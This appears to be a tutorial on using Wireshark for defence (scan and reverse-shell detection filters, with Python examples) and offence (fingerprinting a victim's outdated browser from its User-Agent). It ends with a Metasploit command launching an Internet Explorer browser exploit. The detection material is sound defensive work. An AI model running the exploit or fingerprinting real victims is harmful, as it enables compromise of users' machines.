Weaponizing Wireshark

Wireshark – Defensive Perspective

Wireshark is a powerful network analysis tool that defenders can use to capture and inspect traffic generated by offensive tools such as Nmap and Socat. It allows visibility into network-level activities that may indicate reconnaissance or exploitation attempts.

Common Uses in Defense:

  • Detecting scanning activity (e.g., unusual port probes from Nmap).

  • Identifying unencrypted command execution (e.g., reverse shells via Socat).

  • Monitoring unauthorized use of commonly trusted ports (e.g., cleartext data on port 22 or 443).

Example filters for analysis:

tcp.port == 22 && tcp.len > 0
tcp contains "cmd.exe"
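The two display filters above, together with a simple Nmap-style port-scan heuristic for the first bullet, implemented in Python over constructed packet records so the detection logic can be run offline. This is an added example, not code from the original page or from the Wireshark project; the packet records, the IP addresses, the "first segment of a port-22 flow should start with the SSH- banner" rule and the scan thresholds (20 ports within 2 seconds) are all assumptions made for the illustration.

```python
"""Added example: Wireshark-style display filters and a port-scan heuristic
applied to constructed packet records (not from the original page)."""
from collections import defaultdict
from dataclasses import dataclass


@dataclass
class Packet:
    ts: float        # capture timestamp in seconds
    src: str
    dst: str
    sport: int
    dport: int
    syn_only: bool   # bare SYN with no data, typical of a scanner probe
    payload: bytes   # TCP segment data; tcp.len == len(payload)


# Constructed sample traffic (assumed, not captured): one host probing 40
# ports, a genuine SSH session, a cleartext shell riding on port 22, and a
# TLS ClientHello on 443.
SAMPLE = [
    *[Packet(1.0 + i * 0.01, "10.0.0.5", "10.0.0.20", 40000 + i, port, True, b"")
      for i, port in enumerate(range(1, 41))],
    Packet(5.0, "10.0.0.7", "10.0.0.20", 51000, 22, False, b"SSH-2.0-OpenSSH_9.6\r\n"),
    Packet(5.1, "10.0.0.20", "10.0.0.7", 22, 51000, False, b"SSH-2.0-OpenSSH_9.6\r\n"),
    Packet(6.0, "10.0.0.9", "10.0.0.20", 51200, 22, False,
           b"Microsoft Windows [Version 10.0]\r\nC:\\Users\\bob>"),
    Packet(6.1, "10.0.0.20", "10.0.0.9", 22, 51200, False, b"cmd.exe /c whoami\r\n"),
    Packet(7.0, "10.0.0.11", "10.0.0.20", 52000, 443, False, b"\x16\x03\x01\x00\xc8"),
]


def filter_port22_with_data(packets):
    """Equivalent of the display filter: tcp.port == 22 && tcp.len > 0"""
    return [p for p in packets if 22 in (p.sport, p.dport) and len(p.payload) > 0]


def filter_contains(packets, needle: bytes):
    """Equivalent of: tcp contains "<needle>" (raw byte match over the segment)."""
    return [p for p in packets if needle in p.payload]


def flows_without_ssh_banner(packets):
    """Cleartext on a trusted port: for each port-22 flow, take the first
    segment that carries data. A real SSH session opens with the 'SSH-'
    identification string (assumption about legitimate traffic); anything
    else is a non-SSH protocol using port 22."""
    first_data = {}
    for p in sorted(filter_port22_with_data(packets), key=lambda p: p.ts):
        key = frozenset([(p.src, p.sport), (p.dst, p.dport)])
        first_data.setdefault(key, p)
    return [p for p in first_data.values() if not p.payload.startswith(b"SSH-")]


def scan_sources(packets, min_ports=20, window=2.0):
    """Flag sources that send bare SYNs to at least `min_ports` distinct
    destination ports within `window` seconds. Thresholds are illustrative."""
    per_src = defaultdict(list)
    for p in packets:
        if p.syn_only:
            per_src[p.src].append((p.ts, p.dport))
    hits = {}
    for src, probes in per_src.items():
        probes.sort()
        for i, (t0, _) in enumerate(probes):
            ports = {d for t, d in probes[i:] if t - t0 <= window}
            if len(ports) >= min_ports:
                hits[src] = len(ports)
                break
    return hits


if __name__ == "__main__":
    print("port-22 segments with data:", len(filter_port22_with_data(SAMPLE)))
    for p in filter_contains(SAMPLE, b"cmd.exe"):
        print("cmd.exe seen from", p.src, "->", p.dst)
    for p in flows_without_ssh_banner(SAMPLE):
        print("non-SSH data on port 22 from", p.src)
    print("scan sources:", scan_sources(SAMPLE))
```

The flow-level banner check matters because only the first segment of an SSH session is readable; a per-packet "does not start with SSH-" test would flag every later, encrypted segment of a legitimate session as well.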

Wireshark – Offensive Perspective

While typically used for defense, Wireshark also has value in offensive security operations, particularly during client-side attacks.

Use Case: Fingerprinting the Victim's Environment

When an attacker entices a user to visit a malicious webpage, the attacker's system can capture and analyze HTTP headers, including the User-Agent string, to determine the browser and system configuration.

Captured example:

User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729)

Analysis:

  • MSIE 7.0 indicates Internet Explorer 7, an outdated browser with known vulnerabilities.

  • .NET CLR versions suggest older runtime environments.

  • This information can be used to assess exploitability for attacks such as drive-by downloads or legacy browser exploits.
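The header analysis above, as an added example rather than code from the original page: it pulls the User-Agent out of a captured HTTP request, parses the browser, Windows NT and .NET CLR versions, and reports which components fall below a version cutoff. The same routine lets a defender run over proxy logs or captures to inventory legacy clients in their own environment. The sample request, the example.test hostname, and the cutoffs (IE below 11, CLR below 4.0) are assumptions for the illustration; the User-Agent string itself is the one discussed in the text.

```python
"""Added example: extract and assess a User-Agent header from a captured
HTTP request (not from the original page)."""
import re

# Version cutoffs below which a component is reported as outdated.
# Illustrative assumptions, not values from the original text.
MIN_IE_MAJOR = 11
MIN_CLR = (4, 0)

# The User-Agent string discussed in the text.
SAMPLE_UA = ("Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; "
             "Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729)")

# Constructed HTTP request carrying that header (hostname is a placeholder).
SAMPLE_REQUEST = (
    b"GET /landing.html HTTP/1.1\r\n"
    b"Host: example.test\r\n"
    b"User-Agent: " + SAMPLE_UA.encode("ascii") + b"\r\n"
    b"Accept: */*\r\n\r\n"
)


def user_agent_from_request(raw: bytes):
    """Return the User-Agent header value from a raw HTTP request, or None."""
    head = raw.split(b"\r\n\r\n", 1)[0]
    for line in head.split(b"\r\n")[1:]:          # skip the request line
        name, sep, value = line.partition(b":")
        if sep and name.strip().lower() == b"user-agent":
            return value.strip().decode("latin-1")
    return None


def parse_user_agent(ua: str) -> dict:
    """Extract IE version, Windows NT version, WOW64 flag and .NET CLR versions."""
    ie = re.search(r"MSIE (\d+)\.(\d+)", ua)
    nt = re.search(r"Windows NT (\d+\.\d+)", ua)
    clrs = re.findall(r"\.NET CLR (\d+)\.(\d+)\.(\d+)", ua)
    return {
        "ie_version": (int(ie.group(1)), int(ie.group(2))) if ie else None,
        "windows_nt": nt.group(1) if nt else None,
        "wow64": "WOW64" in ua,
        "clr_versions": [tuple(int(x) for x in c) for c in clrs],
    }


def outdated_components(info: dict) -> list:
    """Human-readable findings for components below the version cutoffs."""
    findings = []
    ie = info["ie_version"]
    if ie and ie[0] < MIN_IE_MAJOR:
        findings.append(f"Internet Explorer {ie[0]}.{ie[1]} (below {MIN_IE_MAJOR})")
    for clr in info["clr_versions"]:
        if clr[:2] < MIN_CLR:
            findings.append(".NET CLR " + ".".join(map(str, clr)) + " (below 4.0)")
    return findings


if __name__ == "__main__":
    ua = user_agent_from_request(SAMPLE_REQUEST)
    info = parse_user_agent(ua)
    print("Parsed:", info)
    for finding in outdated_components(info):
        print("Outdated:", finding)
```

The header is decoded as latin-1 rather than UTF-8 so a malformed or deliberately odd byte sequence in a captured header cannot raise during decoding; the parse functions are written to return None or an empty list for absent components instead of failing on headers from other browsers.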


Summary

Perspective   Objective                                        Wireshark Application
Defensive     Detect and analyze malicious network activity    Monitor traffic from tools like Nmap and Socat
Offensive     Gather client system/browser information         Inspect User-Agent strings to identify outdated software

msfconsole -x "use /exploit/windows/browser/ie unsafe_scripting; set ALLOWPROMPT true; set URIPATH /evil; info; run"
